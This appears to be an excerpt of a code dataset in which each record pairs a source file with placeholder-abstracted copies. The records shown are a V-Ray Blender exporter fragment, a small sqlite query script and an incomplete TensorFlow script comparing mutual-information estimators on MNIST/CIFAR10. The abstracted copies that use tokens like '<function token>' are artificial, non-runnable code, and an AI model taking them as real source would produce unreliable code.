exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\n<function token>\n<function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\n<function token>\n<function token>\n<function token>\n",
"<import token>\n<assignment token>\n<code token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,822 | f2ce68146ed6eed776f9e0c0e18e9109ceccbd3c | import csv
import re
import sys
from sys import argv, exit
import itertools
# if len(argv) != 2:
# print("Usage: python dna.py data.csv")
# exit(1)
# house=argv[1]
house='Slytherin'
import sqlite3
conn = sqlite3.connect('students.db')
c = conn.cursor()
for row in c.execute('SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first',(house,)):
if row[1]=='NULL':
print(row[0],row[2],', born',row[4])
else:
print(row[0],row[1],row[2],', born',row[4])
| [
"import csv\nimport re\nimport sys\nfrom sys import argv, exit\nimport itertools\n\n# if len(argv) != 2:\n# print(\"Usage: python dna.py data.csv\")\n# exit(1)\n# house=argv[1]\n\nhouse='Slytherin'\n\nimport sqlite3\nconn = sqlite3.connect('students.db')\nc = conn.cursor()\n\nfor row in c.execute('SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first',(house,)):\n if row[1]=='NULL':\n print(row[0],row[2],', born',row[4])\n else:\n print(row[0],row[1],row[2],', born',row[4])\n \n\n",
"import csv\nimport re\nimport sys\nfrom sys import argv, exit\nimport itertools\nhouse = 'Slytherin'\nimport sqlite3\nconn = sqlite3.connect('students.db')\nc = conn.cursor()\nfor row in c.execute(\n 'SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first'\n , (house,)):\n if row[1] == 'NULL':\n print(row[0], row[2], ', born', row[4])\n else:\n print(row[0], row[1], row[2], ', born', row[4])\n",
"<import token>\nhouse = 'Slytherin'\n<import token>\nconn = sqlite3.connect('students.db')\nc = conn.cursor()\nfor row in c.execute(\n 'SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first'\n , (house,)):\n if row[1] == 'NULL':\n print(row[0], row[2], ', born', row[4])\n else:\n print(row[0], row[1], row[2], ', born', row[4])\n",
"<import token>\n<assignment token>\n<import token>\n<assignment token>\nfor row in c.execute(\n 'SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first'\n , (house,)):\n if row[1] == 'NULL':\n print(row[0], row[2], ', born', row[4])\n else:\n print(row[0], row[1], row[2], ', born', row[4])\n",
"<import token>\n<assignment token>\n<import token>\n<assignment token>\n<code token>\n"
] | false |
99,823 | e6b257f5af60bfeec69f960de76485c576941515 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# reference links:
# From https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb
# https://github.com/google-research/google-research/blob/master/mutual_information_representation_learning/mirl.ipynb
# https://github.com/yaohungt/Pointwise_Dependency_Neural_Estimation/tree/master/RepreLearn_Shallow
from __future__ import division
from __future__ import print_function
import collections
import copy
import functools
import itertools
import os
import pickle
import argparse
from matplotlib import pyplot as plt
from matplotlib.ticker import FuncFormatter
import numpy as np
import pandas as pd
from scipy.ndimage import gaussian_filter1d
import seaborn as sns
import tensorflow as tf
from tensorflow.python.ops.parallel_for import gradients
import tensorflow_datasets as tfds
import tensorflow_probability as tfp
import sklearn.linear_model as sk_linear
parser = argparse.ArgumentParser(description='Representation Learning Experiments')
parser.add_argument('--dataset', default='mnist', type=str,
help='cifar10 or mnist')
parser.add_argument('--lr', default=1e-4, type=float,
help='learning rate')
parser.add_argument('--batch_size', default=100, type=int,
help='mini batch size')
parser.add_argument('--smoothing', default=0.01, type=float,
help='label smoothing parameter')
parser.add_argument('--output_dir', type=str, default='./runs',
help='directory where the results will be stored')
args = parser.parse_args()
a, b, c = 0.005, 0.1, 0.9
if not os.path.isdir(args.output_dir):
os.mkdir(args.output_dir)
# learning rate for ours CIFAR10 is 1e-4, otherwise follows below
TFDS_NAME = args.dataset #"cifar10" # mnist or cifar10
NRUNS = 10 #@param { type: "slider", min: 1, max: 20, step: 1}
# parameters for training
if TFDS_NAME == "mnist":
DIMS = 784
elif TFDS_NAME == "cifar10":
DIMS = 3072
LEARNING_RATE = args.lr #1e-5
N_CLASSES = 10
TRAIN_BATCH_SIZE = args.batch_size #64 #@param { type: "slider", min: 64, max: 128, step: 64}
# save results
# RESULT_DIR = '{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)
RESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)
RUN_EXPERIMENTS = True
FEATURE_INPUT = "image"
FEATURE_LABEL = "label"
#slim = tf.contrib.slim
tfb = tfp.bijectors
tfd = tfp.distributions
tfkl = tf.keras.layers
tf.keras.backend.clear_session()
ResultsConfig = collections.namedtuple(
"ResultsConfig", ["nets", "critic", "loss"])
Results = collections.namedtuple(
'Results',
['iterations', 'training_losses', 'testing_losses',
'classification_accuracies', 'singular_values'])
ResultsAdversarial = collections.namedtuple(
"ResultsAdversarial",
["losses_e", "losses_c", "classification_accuracies", "iters"]
)
ResultsSamplingIssues = collections.namedtuple(
"ResultsSamplingIssues", ["mi_true", "nce_estimates_noniid",
"nce_estimates_iid", "nwj_estimates_noniid",
"nwj_estimates_iid"])
def acti_func(x, a, b, c):
# y: a
# x: 0 b c 1
x = tf.stop_gradient(x)
alpha = tf.zeros_like(x)
alpha = tf.where(x<=b, -a*x/b+a, alpha)
alpha = tf.where((x>b) & (x<c), 0., alpha)
alpha = tf.where(x>=c, a*x/(1-c)+a*c/(c-1), alpha)
return alpha
def convert_to_data_frame(result, exp_name, nets, critic, loss, seed):
"""Convert results class to a data frame."""
label = "{}, {}, {}".format(nets, critic, loss)
rows = list(
zip(
itertools.repeat(exp_name),
itertools.repeat(nets),
itertools.repeat(critic),
itertools.repeat(loss),
itertools.repeat(seed),
result.iterations,
[-loss for loss in result.testing_losses], # Loss -> bound.
result.classification_accuracies,
itertools.repeat(label)))
df_eval = pd.DataFrame(
rows,
columns=("exp_name", "nets", "Critic", "Estimator",
"run", "iteration", "bound_value", "accuracy", "label"))
df_eval["Estimator"] = df_eval["Estimator"].replace(
to_replace={
"cpc": "$CPC$",
"pcc": "$PCC$",
"drfc": "$D-RFC$",
"wpc": "$WPC$"
})
df_eval["Critic"] = df_eval["Critic"].replace(
to_replace={
"concat": "MLP",
"separable": "Separable",
"innerprod": "Inner product",
"bilinear": "Bilinear"
})
return df_eval
def apply_default_style(ax):
ax.set_xlim([0, 20001])
ax.get_xaxis().set_major_formatter(
FuncFormatter(lambda x, p: format(int(x/1000), ',')))
ax.set_xlabel("Training steps (in thousands)")
plt.tick_params(top=False, right=False, bottom=False, left=False)
handles, labels = ax.get_legend_handles_labels()
plt.legend(loc="lower right", handles=handles[1:], labels=labels[1:])
def get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):
total_loss = 0
for i in range(0, x_array.shape[0], batch_size):
x_slice = x_array[i:i+batch_size, :dims]
total_loss += x_slice.shape[0] * session.run(loss,
feed_dict={data_ph: x_slice})
return total_loss / x_array.shape[0]
def get_classification_accuracy(session, codes, data_ph, dims):
x_train_mapped = map_data(x_train, session, codes, data_ph, dims)
x_test_mapped = map_data(x_test, session, codes, data_ph, dims)
accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)
return accuracy
def map_data(x_array, session, codes, data_ph, dims, batch_size=512):
x_mapped = []
for i in range(0, x_array.shape[0], batch_size):
x_mapped.append(
session.run(codes,
feed_dict={data_ph: x_array[i:i+batch_size, :dims]}))
return np.concatenate(x_mapped, axis=0)
def reduce_logmeanexp_nodiag(x, axis=None):
batch_size = x.shape[0]
logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(np.inf * tf.ones(batch_size)), axis=axis)
if axis:
num_elem = batch_size - 1.
else:
num_elem = batch_size * (batch_size - 1.)
return logsumexp - tf.math.log(num_elem)
def tuba_lower_bound(scores, log_baseline=None):
if log_baseline is not None:
scores -= log_baseline[:, None]
batch_size = tf.cast(scores.shape[0], tf.float32)
# First term is an expectation over samples from the joint,
# which are the diagonal elmements of the scores matrix.
joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))
# Second term is an expectation over samples from the marginal,
# which are the off-diagonal elements of the scores matrix.
marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))
return 1. + joint_term - marg_term
def nwj_lower_bound(scores):
# equivalent to: tuba_lower_bound(scores, log_baseline=1.)
return tuba_lower_bound(scores - 1.)
@tf.function
def js_fgan_lower_bound(f):
"""Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016)."""
f_diag = tf.linalg.tensor_diag_part(f)
first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))
n = tf.cast(f.shape[0], tf.float32)
second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))
return first_term - second_term
@tf.function
def infonce_lower_bound(scores):
"""InfoNCE lower bound from van den Oord et al. (2018)."""
nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.reduce_logsumexp(input_tensor=scores, axis=1))
mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll
return mi
@tf.function
def our_lower_bound(scores):
# scores: 128, 128
"""Our lower bound"""
batch_size = tf.cast(scores.shape[0], tf.float32)
joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))
# expectation
scores_sq = scores**2
marg_num = batch_size * (batch_size - 1.)
marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(input_tensor=tf.linalg.diag_part(scores_sq))
marg_term = marg_term / marg_num
# tf.print(joint_term - 0.5*marg_term)
return joint_term - 0.5*marg_term
# nll = tf.reduce_mean(tf.linalg.diag_part(scores) - 0.5 * tf.math.reduce_euclidean_norm(scores, axis=1))
# tf.print(nll)
# mi = tf.math.log(tf.cast(scores.shape[0].value, tf.float32)) + nll
# return mi
@tf.function
def skew_js_fgan_lower_bound(f):
"""skewed js lower bound (true cross entropy)"""
n = tf.cast(f.shape[0], tf.float32)
alpha = 1/n
f_diag = tf.linalg.tensor_diag_part(f)
first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))
second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))
return alpha*first_term - (1-alpha)*second_term
@tf.function
def label_smooth_pcc(f):
""" pcc with label smoothing trick"""
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(labels, pre_prob)
@tf.function
def predict_smooth_pcc(f):
""" pcc with predictor smoothing trick"""
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
# labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(labels, pre_prob)
@tf.function
def adap_label_smooth_pcc(f):
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
# labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
alpha = acti_func(pre_prob, a, b, c)
new_labels = (1.0 - alpha) * labels + alpha / 2
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(new_labels, pre_prob)
@tf.function
def adap_pred_smooth_pcc(f):
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
# labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
# print('pre_prob:',pre_prob)
alpha = acti_func(pre_prob, a, b, c)
pre_prob = (1.0 - alpha) * pre_prob + alpha / 2
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(labels, pre_prob)
# @title Define the linear evaluation protocol { display-mode: "form" }
def logistic_fit(x_train, y_train, x_test, y_test):
logistic_regressor = sk_linear.LogisticRegression(
solver='saga', multi_class='multinomial', tol=.1, C=10.)
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.transform(x_test)
logistic_regressor.fit(x_train, y_train.ravel())
return logistic_regressor.score(x_test, y_test.ravel())
# @title Define and load the dataset, check baseline in pixel space { display-mode: "form" }
tf.compat.v1.reset_default_graph()
def map_fn(example):
image = example[FEATURE_INPUT]
image = tf.cast(image, tf.float32) / 255.0
image = tf.reshape(image, [-1]) # Flatten.
label = example[FEATURE_LABEL]
return {FEATURE_INPUT: image, FEATURE_LABEL: label}
def load_data(split):
return (tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split)
.cache()
.map(map_func=map_fn)
.shuffle(1000))
def tfds_to_np(dataset):
features = list(tfds.as_numpy(dataset))
images = np.stack([f[FEATURE_INPUT].ravel() for f in features])
labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])
return images, labels
dataset_train = load_data("train")
dataset_test = load_data("test")
x_train, y_train = tfds_to_np(dataset_train)
x_test, y_test = tfds_to_np(dataset_test)
tf.compat.v1.reset_default_graph()
x_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)
x_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)
print("Fit on half the pixels: {}. It should be around 0.835.".format(
logistic_fit(x_train_noisy[:, :DIMS//2], y_train,
x_test_noisy[:, :DIMS//2], y_test)))
def processed_train_data(dims, batch_size):
dataset = load_data("train")
dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)
get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched).get_next()
features = get_next[FEATURE_INPUT]
labels = get_next[FEATURE_LABEL]
# Martin: where the problem occurs
x_1, x_2 = tf.split(features, [dims, DIMS-dims], axis=-1)
return x_1, x_2, labels
class MLP(tf.keras.Model):
def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):
super(MLP, self).__init__()
self._layers = [tfkl.Dense(dimensions, **dense_kwargs)
for dimensions in layer_dimensions[:-1]]
dense_kwargs_copy = copy.deepcopy(dense_kwargs)
dense_kwargs_copy["activation"] = None
self._layers.append(tfkl.Dense(layer_dimensions[-1], **dense_kwargs_copy))
self._shortcuts = shortcuts
@property
def layers(self):
return self._layers
def __call__(self, inputs):
x = inputs
for layer in self.layers:
x = layer(x) + x if self._shortcuts else layer(x)
return x
# LayerNorm implementation copied from
# https://stackoverflow.com/questions/39095252/fail-to-implement-layer-normalization-with-keras
class LayerNorm(tfkl.Layer):
""" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 """
def __init__(self, scale_initializer='ones', bias_initializer='zeros',
axes=[1,2,3], epsilon=1e-6, **kwargs):
super(LayerNorm, self).__init__(**kwargs)
self.epsilon = epsilon
self.scale_initializer = tf.keras.initializers.get(scale_initializer)
self.bias_initializer = tf.keras.initializers.get(bias_initializer)
self.axes = axes
def build(self, input_shape):
self.scale = self.add_weight(shape=(input_shape[-1],),
initializer=self.scale_initializer,
trainable=True,
name='{}_scale'.format(self.name))
self.bias = self.add_weight(shape=(input_shape[-1],),
initializer=self.bias_initializer,
trainable=True,
name='{}_bias'.format(self.name))
self.built = True
def call(self, x, mask=None):
mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)
std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)
norm = (x - mean) * (1/(std + self.epsilon))
return norm * self.scale + self.bias
def compute_output_shape(self, input_shape):
return input_shape
class ConvNet(tf.keras.Sequential):
def __init__(self, channels=64, kernel_size=5, input_dim=DIMS//2, output_dim=100,
activation=tf.nn.relu):
# Note: This works only for the specific data set considered here.
super(ConvNet, self).__init__([
tfkl.Reshape((14, 28, 1), input_shape=(input_dim,)),
tfkl.Conv2D(channels, kernel_size, strides=2,
padding="same", activation=activation),
tfkl.Conv2D(2*channels, kernel_size, strides=2,
padding="same", activation=activation),
LayerNorm(),
tfkl.GlobalAveragePooling2D(),
tfkl.Dense(output_dim),
])
from tensorflow_probability.python.internal import tensorshape_util
import tensorflow.compat.v1 as tf1
from tensorflow_probability.python.bijectors import affine_scalar
from tensorflow_probability.python.bijectors import bijector as bijector_lib
# Modified from tensorflow_probability/python/bijectors/real_nvp.py
class RealNVP(bijector_lib.Bijector):
def __init__(self,
num_masked,
shift_and_log_scale_fn=None,
bijector_fn=None,
is_constant_jacobian=False,
validate_args=False,
name=None):
name = name or 'real_nvp'
if num_masked < 0:
raise ValueError('num_masked must be a non-negative integer.')
self._num_masked = num_masked
# At construction time, we don't know input_depth.
self._input_depth = None
if bool(shift_and_log_scale_fn) == bool(bijector_fn):
raise ValueError('Exactly one of `shift_and_log_scale_fn` and '
'`bijector_fn` should be specified.')
if shift_and_log_scale_fn:
def _bijector_fn(x0, input_depth, **condition_kwargs):
shift, log_scale = shift_and_log_scale_fn(x0, input_depth,
**condition_kwargs)
# ** First modification is here.
return affine_scalar.AffineScalar(shift=shift, scale=log_scale)
bijector_fn = _bijector_fn
if validate_args:
bijector_fn = _validate_bijector_fn(bijector_fn)
# Still do this assignment for variable tracking.
self._shift_and_log_scale_fn = shift_and_log_scale_fn
self._bijector_fn = bijector_fn
super(RealNVP, self).__init__(
forward_min_event_ndims=1,
is_constant_jacobian=is_constant_jacobian,
validate_args=validate_args,
name=name)
def _cache_input_depth(self, x):
if self._input_depth is None:
self._input_depth = tf.compat.dimension_value(
tensorshape_util.with_rank_at_least(x.shape, 1)[-1])
if self._input_depth is None:
raise NotImplementedError(
'Rightmost dimension must be known prior to graph execution.')
if self._num_masked >= self._input_depth:
raise ValueError(
'Number of masked units must be smaller than the event size.')
def _forward(self, x, **condition_kwargs):
self._cache_input_depth(x)
x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]
y1 = self._bijector_fn(x0, self._input_depth - self._num_masked,
**condition_kwargs).forward(x1)
y = tf.concat([x0, y1], axis=-1)
return y
def _inverse(self, y, **condition_kwargs):
self._cache_input_depth(y)
y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]
x1 = self._bijector_fn(y0, self._input_depth - self._num_masked,
**condition_kwargs).inverse(y1)
x = tf.concat([y0, x1], axis=-1)
return x
def _forward_log_det_jacobian(self, x, **condition_kwargs):
self._cache_input_depth(x)
x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]
return self._bijector_fn(x0, self._input_depth - self._num_masked,
**condition_kwargs).forward_log_det_jacobian(
x1, event_ndims=1)
def _inverse_log_det_jacobian(self, y, **condition_kwargs):
self._cache_input_depth(y)
y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]
return self._bijector_fn(y0, self._input_depth - self._num_masked,
**condition_kwargs).inverse_log_det_jacobian(
y1, event_ndims=1)
def real_nvp_default_template(hidden_layers,
shift_only=False,
activation=tf.nn.relu,
name=None,
*args, # pylint: disable=keyword-arg-before-vararg
**kwargs):
with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):
def _fn(x, output_units, **condition_kwargs):
"""Fully connected MLP parameterized via `real_nvp_template`."""
if condition_kwargs:
raise NotImplementedError(
'Conditioning not implemented in the default template.')
if tensorshape_util.rank(x.shape) == 1:
x = x[tf.newaxis, ...]
reshape_output = lambda x: x[0]
else:
reshape_output = lambda x: x
for units in hidden_layers:
x = tf1.layers.dense(
inputs=x,
units=units,
activation=activation,
*args, # pylint: disable=keyword-arg-before-vararg
**kwargs)
x = tf1.layers.dense(
inputs=x,
units=(1 if shift_only else 2) * output_units,
activation=None,
*args, # pylint: disable=keyword-arg-before-vararg
**kwargs)
if shift_only:
return reshape_output(x), None
shift, log_scale = tf.split(x, 2, axis=-1)
# ** Here is the second modification.
return reshape_output(shift), 1e-7 + tf.nn.softplus(reshape_output(log_scale))
return tf1.make_template('real_nvp_default_template', _fn)
class RealNVPBijector(tf.keras.Model):
def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):
super(RealNVPBijector, self).__init__()
permutations = [np.random.permutation(dimensions)
for _ in range(n_couplings)]
bijectors = []
for permutation in permutations:
bijectors.append(RealNVP(
dimensions // 2,
real_nvp_default_template(hidden_layers, **dense_kwargs)))
bijectors.append(tfb.Permute(permutation))
self._bijector = tfb.Chain(bijectors)
def call(self, inputs):
return self._bijector.forward(inputs)
class InnerProdCritic(tf.keras.Model):
def call(self, x, y):
return tf.matmul(x, y, transpose_b=True)
class BilinearCritic(tf.keras.Model):
def __init__(self, feature_dim=100, **kwargs):
super(BilinearCritic, self).__init__(**kwargs)
self._W = tfkl.Dense(feature_dim, use_bias=False)
def call(self, x, y):
return tf.matmul(x, self._W(y), transpose_b=True)
# https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb
class ConcatCritic(tf.keras.Model):
def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):
super(ConcatCritic, self).__init__(**kwargs)
# output is scalar score
self._f = MLP([hidden_dim for _ in range(layers)]+[1], False, {"activation": "relu"})
def call(self, x, y):
batch_size = tf.shape(input=x)[0]
# Tile all possible combinations of x and y
x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))
y_tiled = tf.tile(y[:, None], (1, batch_size, 1))
# xy is [batch_size * batch_size, x_dim + y_dim]
xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2),
[batch_size * batch_size, -1])
# Compute scores for each x_i, y_j pair.
scores = self._f(xy_pairs)
return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))
class SeparableCritic(tf.keras.Model):
def __init__(self, hidden_dim=100, output_dim=100, layers=1,
activation='relu', **kwargs):
super(SeparableCritic, self).__init__(**kwargs)
self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {"activation": activation})
self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {"activation": activation})
def call(self, x, y):
x_mapped = self._f_x(x)
y_mapped = self._f_y(y)
return tf.matmul(x_mapped, y_mapped, transpose_b=True)
def train(g1,
g2,
critic,
loss_fn,
learning_rate,
batch_size=TRAIN_BATCH_SIZE,
n_iters=15000,
n_evals=15,
compute_jacobian=False,
noise_std=0.0,
data_dimensions=DIMS//2,
n_iter=1,
loss_name='InfoNCE',
):
"""Runs the training loop for a fixed model.
Args:
g1: Function, maps input1 to representation.
g2: Function, maps input2 to representation.
critic: Function, maps two representations to scalar.
loss_fn: Function, mutual information estimator.
learning_rate: Learning rate.
batch_size: Training batch size.
n_iters: Number of optimization iterations.
n_evals: Number of model evaluations.
compute_jacobian: Whether to estimate the singular values of the Jacobian.
noise_std: Standard deviation for the Gaussian noise. Default is 0.0.
data_dimensions: The dimension of the data. By default it's half of the
original data dimension.
Returns:
Returns and instance of `Results` tuple.
"""
x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)
if noise_std > 0.0:
assert x_1.shape == x_2.shape, "X1 and X2 shapes must agree to add noise!"
noise = noise_std * tf.random.normal(x_1.shape)
x_1 += noise
x_2 += noise
# Compute the representations.
code_1, code_2 = g1(x_1), g2(x_2)
critic_matrix = critic(code_1, code_2)
# Compute the Jacobian of g1 if needed.
if compute_jacobian:
jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)
singular_values = tf.linalg.svd(jacobian, compute_uv=False)
# Optimizer setup.
loss = loss_fn(critic_matrix)
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)
if not loss_name == 'wpc':
optimizer_op = optimizer.minimize(loss)
else:
gvs = optimizer.compute_gradients(loss)
capped_gvs = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gvs]
optimizer_op = optimizer.apply_gradients(capped_gvs)
with tf.compat.v1.Session() as session:
session.run(tf.compat.v1.global_variables_initializer())
# Subgraph for eval (add noise to input if necessary)
data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None, data_dimensions])
data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(input=data_ph))
codes = g1(data_ph_noisy)
training_losses, testing_losses, classification_accuracies, iters, sigmas \
= [], [], [], [], []
# Main training loop.
for iter_n in range(n_iters):
# Evaluate the model performance.
if iter_n % (n_iters // n_evals) == 0:
iters.append(iter_n)
accuracy = get_classification_accuracy(session, codes, data_ph, data_dimensions)
classification_accuracies.append(accuracy)
testing_losses.append(
get_testing_loss(x_test, session, loss, data_ph, data_dimensions))
if compute_jacobian:
sigmas.append(session.run(singular_values))
print("{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}".format(\
n_iter, loss_name, iter_n, accuracy, args.dataset, args.batch_size, args.lr))
# Run one optimization step.
loss_np, _ = session.run([loss, optimizer_op])
training_losses.append(loss_np)
return Results(iterations=iters,
training_losses=training_losses,
testing_losses=testing_losses,
classification_accuracies=classification_accuracies,
singular_values=sigmas)
def run_sweep(nets, critics, loss_fns, exp_name, **kwargs):
"""Runs the sweep across encoder networks, critics, and the estimators."""
grid = itertools.product(nets, critics, loss_fns)
data_frames = []
results_with_singular_values = []
for nets_name, critic_name, loss_name in grid:
print("[New experiment] encoder: {}, critic: {}, loss: {}".format(
nets_name, critic_name, loss_name))
with tf.Graph().as_default():
g1, g2 = nets[nets_name]()
critic = critics[critic_name]()
loss_fn = loss_fns[loss_name]
results_per_run = []
for n in range(NRUNS):
